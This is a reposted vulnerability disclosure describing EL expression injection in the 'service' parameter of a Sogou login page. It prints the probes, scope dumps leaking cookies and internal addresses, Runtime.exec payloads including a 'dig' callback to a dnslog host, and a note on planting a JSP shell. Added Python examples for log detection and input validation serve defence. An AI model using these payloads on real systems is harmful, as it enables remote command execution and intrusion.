
A Sogou system has a remote EL expression injection vulnerability (command execution)

2016-06-02 11:45
Title: A Sogou system has a remote EL expression injection vulnerability (command execution)
Vendor: Sogou
Author: 猪猪侠
Submitted: 2016-04-13 16:01
Published: 2016-06-01 09:20
Vulnerability type: command execution
Severity:
Self-assessed rank: 20
Status: confirmed by vendor
Tags:

Vulnerability details

#1 Vulnerable URL

https://auth.p4p.sogou.com/login?service=${1000-900}

https://auth.p4p.sogou.com/login?service=${pageContext}
action="[email protected] " method="post">

#2 The result of the evaluated expression is returned in the page

[screenshot: expcetion.png]

Obtaining the web path

${pageContext.getSession().getServletContext().getClassLoader().getResource("")}

file:/opt/local/resin/

https://auth.p4p.sogou.com/login?service=${requestScope}
{javax.servlet.jsp.jstl.fmt.locale=zh_CN, org.springframework.validation.BindingResult.credentials=org.springframework.webflow.mvc.view.BindingModel: 0 errors, flashScope=map[[empty]], flowExecutionUrl=/login?service=%5BLjava.lang.String%3B%40660b2cde, warnCookieValue=false, javax.servlet.forward.servlet_path=/login, org.springframework.web.servlet.support.RequestContext.CONTEXT=Flow ApplicationContext [login]: startup date [Tue Apr 12 21:38:02 CST 2016]; parent: WebApplicationContext for namespace 'eunomia-servlet', org.springframework.web.servlet.DispatcherServlet.THEME_SOURCE=WebApplicationContext for namespace 'eunomia-servlet': startup date [Tue Apr 12 21:37:56 CST 2016]; parent: Root WebApplicationContext, caucho.forward=true, javax.servlet.forward.request_uri=/login, javax.servlet.forward.query_string=service=${requestScope}, loginTicket=LT-16293-w2RJq4zIVtOY04HWxDFFgagPRy271m, javax.servlet.forward.context_path=, phoneValidationModel=com.sogou.bizdev.eunomia.validation.phone.Ph[email protected] , [email protected] [Attributes={}, targetRequestPath=null, targetRequestParams={}], flowRequestContext=[[email protected] externalContext = [email protected] 9d, currentEvent = viewAcountLogin, requestScope = map[[empty]], attributes = map[[empty]], messageContext = [[email protected] sourceMessages = map[[null] -> list[[empty]]]], flowExecution = [[email protected] flow = 'login', flowSessions = list[[[email protected] flow = 'login', state = 'accountViewLoginForm', scope = map['phoneValidationModel' -> [email protected] a91c3c, 'loginTicket' -> 'LT-16293-w2RJq4zIVtOY04HWxDFFgagPRy271m', 'service' -> ${requestScope}, 'credentials' -> [username: null], 'warnCookieValue' -> false, 'ticketGrantingTicketId' -> [null], 'viewScope' -> map['commandName' -> 'credentials']]]]]], viewScope=map['commandName' -> 'credentials'], javax.servlet.jsp.jstl.fmt.localizationContext=org.springframewor[email protected] , [email protected] [email protected] ae, 
org.springframework.web.servlet.DispatcherServlet.CONTEXT=WebApplicationContext for namespace 'eunomia-servlet': startup date [Tue Apr 12 21:37:56 CST 2016]; parent: Root WebApplicationContext, org.springframework.web.servlet.DispatcherServlet.THEME_RESOLVER=[email protected] , flowExecutionKey=e110s1, service=${requestScope}, commandName=credentials, encodingFilter.FILTERED=true, credentials=[username: null]}

https://auth.p4p.sogou.com/login?service=${header}
{Upgrade-Insecure-Requests=1, Accept-Language=zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4, Cookie=SUV=1446734204911570; IPLOC=CN4401; SUID=BA5782774FC80D0A00000000563B6987; pgv_pvi=3484909568; sct=4; LSTMV=703%2C260; LCLKINT=108193; CXID=5CE9FE68778002DCEC30C2A9412EBA10; GOTO=; ad=3wENElllll2Q7p51lllllVtpqM7lllllNcJUWlllll9lllllxTDll5@@@@@@@@@@; _euid=75841017-9d86-4069-9421-d077bd8489ef; JSESSIONID=abcN1iKReDhPacJcOLoqv; session_id_agent_crm=8a089ef7-44bf-493b-81bc-45a327cf03ec, Host=auth.p4p.sogou.com, PROXY_ADDR=10.149.29.104, Accept-Encoding=gzip, deflate, sdch, X-Real-IP=119.130.85.119, X-Forwarded-For=*******, User-Agent=, Connection=close, Accept=text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8}

Proof of vulnerability:

EL expression reference

http://www.cnblogs.com/xdp-gacl/p/3938361.html

Exploitation method 1

[email protected] @toString(@[email protected] ().exec(\u0027ifconfig\u0027).getInputStream())}

#3 Executing a command

${pageContext.request.getSession().setAttribute("a",pageContext.request.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("dig sougou.99fd5e.dnslog.info",null).getInputStream())}

CloudEYE:

13-Apr-2016 18:42:50.858 queries: client 208.69.37.21#19674 (sougou.99fd5e.dnslog.info): query: sougou.99fd5e.dnslog.info IN A -E (128.199.200.236)
13-Apr-2016 18:42:53.876 queries: client 208.69.37.17#53756 (sougou.99fd5e.dnslog.info): query: sougou.99fd5e.dnslog.info IN A -E (128.199.200.236)

Reading ${sessionScope} then returns the echoed content of the attribute a=InputStream: [email protected]

Obtaining the WebROOT
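The probes above (`${1000-900}`, `${pageContext}`, `${requestScope}`, and finally the `java.lang.Runtime` invocation) all travel in the `service` query parameter, and the command execution itself is only visible out of band through the DNS callback. A request-layer detector therefore has to work from the access log. The following Python is an added example, not code from the report or from Sogou's system: it parses constructed access-log lines, percent-decodes each parameter repeatedly (so double encoding is not missed), resolves Java-style `\uXXXX` escapes like the `\u0027` used in the report's payload, and then looks for `${...}` / `#{...}` expressions, grading a finding as `critical` when the expression reaches for reflection or process execution.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines for this example (not taken from the report).
SAMPLE_LOG = """\
10.0.0.5 - - [13/Apr/2016:18:42:50 +0800] "GET /login?service=https%3A%2F%2Fp4p.example.test%2Fhome HTTP/1.1" 200 5120
10.0.0.9 - - [13/Apr/2016:18:42:51 +0800] "GET /login?service=%24%7B1000-900%7D HTTP/1.1" 200 5120
10.0.0.9 - - [13/Apr/2016:18:42:52 +0800] "GET /login?service=${pageContext.request.getClass().forName(%22java.lang.Runtime%22)} HTTP/1.1" 200 5120
10.0.0.9 - - [13/Apr/2016:18:42:53 +0800] "GET /login?service=%23%7BrequestScope%7D HTTP/1.1" 200 5120
10.0.0.9 - - [13/Apr/2016:18:42:54 +0800] "GET /login?service=%2524%257B%2522%2522.getClass().forName(%255Cu0027java.lang.Runtime%255Cu0027)%257D HTTP/1.1" 200 5120
10.0.0.7 - - [13/Apr/2016:18:42:55 +0800] "GET /static/app.js HTTP/1.1" 200 900
"""

# Common-log-format request line: "METHOD target HTTP/x.y"
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# EL delimiters after decoding: ${...} or #{...}
EL_RE = re.compile(r'[$#]\{[^}]*\}')
# Java-style unicode escapes such as \u0027 (single quote)
UNICODE_ESC_RE = re.compile(r'\\u([0-9a-fA-F]{4})')
# Tokens that turn an arithmetic probe into reflection / process execution
CRITICAL_TOKENS = ("java.lang.Runtime", "getRuntime", "getClass", "forName",
                   "ProcessBuilder", ".exec(", "getClassLoader", "pageContext")


def normalize(value, rounds=3):
    """Percent-decode repeatedly (catches double encoding), then resolve \\uXXXX escapes."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return UNICODE_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), value)


def analyze_target(target):
    """Return EL findings for one request target (path + query string)."""
    findings = []
    query = urlsplit(target).query
    for name, raw_value in parse_qsl(query, keep_blank_values=True):
        value = normalize(raw_value)
        for expr in EL_RE.findall(value):
            severity = "critical" if any(t in expr for t in CRITICAL_TOKENS) else "probe"
            findings.append({"param": name, "expression": expr, "severity": severity})
    return findings


def scan_log(text):
    """Scan every request line in an access log and return all EL findings."""
    results = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        for f in analyze_target(m.group("target")):
            results.append(dict(line_no=line_no, **f))
    return results


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line_no']}: {f['severity']:8} {f['param']}={f['expression']}")
```

Decoding before matching is the part that matters: the second and fifth sample lines never contain a literal `${` in the raw log, so a detector that greps the raw request line misses exactly the encodings a scanner tries first.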

https://auth.p4p.sogou.com/login?service=${applicationScope}

javax.servlet.context.tempdir=/opt/app/eunomia/WEB-INF/tmp,
org.springframework.web.context.WebApplicationContext.ROOT=Root WebApplicationContext

Then a command can be used to write a JSP file into this directory, /opt/app/eunomia/.

Fix recommendation:

#4 Validate client-supplied variables
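As an added defensive example (not code from the report or from Sogou's system), the following Python models the check the fix recommendation calls for. A CAS-style login endpoint only ever needs `service` to be the URL of a registered application, so the validator accepts an https URL whose host is on a registered-service allowlist and rejects everything else; any value that still contains an EL delimiter after repeated percent-decoding and Java-style unicode unescaping is refused before it is parsed at all. The allowlist hosts are constructed for the example.

```python
import re
from urllib.parse import urlsplit, unquote

# Assumed allowlist of registered service hosts (constructed for this example).
REGISTERED_SERVICE_HOSTS = {"p4p.example.test", "crm.example.test"}
EL_DELIMITER_RE = re.compile(r'[$#]\{')
UNICODE_ESC_RE = re.compile(r'\\u([0-9a-fA-F]{4})')
MAX_LEN = 2048


def canonicalize(raw, rounds=3):
    """Undo the encodings an attacker would use to hide a delimiter."""
    value = raw
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return UNICODE_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), value)


def validate_service(raw):
    """Return (accepted, reason) for a client-supplied `service` parameter."""
    if not raw:
        return False, "missing"
    if len(raw) > MAX_LEN:
        return False, "too long"
    value = canonicalize(raw)
    # Expression syntax has no business in a service URL: reject before parsing.
    if EL_DELIMITER_RE.search(value):
        return False, "expression delimiter"
    if not all(0x20 <= ord(c) < 0x7f for c in value):
        return False, "non-printable or non-ascii"
    parts = urlsplit(value)
    if parts.scheme != "https":
        return False, "scheme"
    if parts.username or parts.password:
        return False, "credentials in url"
    # Exact host match: no suffix matching, so evil.example cannot append the allowed host.
    if not parts.hostname or parts.hostname.lower() not in REGISTERED_SERVICE_HOSTS:
        return False, "unregistered host"
    return True, "ok"


def resolve_service(raw, default="https://p4p.example.test/"):
    """Return the validated service URL, or the default landing URL when validation fails."""
    accepted, _reason = validate_service(raw)
    return raw if accepted else default


if __name__ == "__main__":
    for candidate in ("https://p4p.example.test/home", "${1000-900}",
                      "%24%7BrequestScope%7D", "https://evil.example/"):
        print(candidate, "->", validate_service(candidate))
```

The delimiter check is defense in depth; the allowlist is the primary control, and it also closes the open-redirect case that a login `service` parameter invites. Independently of input validation, the reflected value must reach the page as a literal and never be handed to an EL evaluator, which is the root cause this report demonstrates.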

Copyright notice: when reposting, please credit the source: 猪猪侠@乌云 (WooYun)

Source: www.secpulse.com/archives/47852.html
